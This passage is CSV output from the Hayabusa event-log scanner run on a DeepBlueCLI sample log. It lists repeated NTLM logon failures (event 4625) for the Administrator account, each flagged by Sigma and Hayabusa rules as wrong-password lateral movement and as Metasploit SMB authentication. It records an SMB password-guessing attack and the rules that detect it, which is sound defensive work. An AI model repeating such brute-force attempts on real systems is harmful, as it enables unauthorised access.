Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
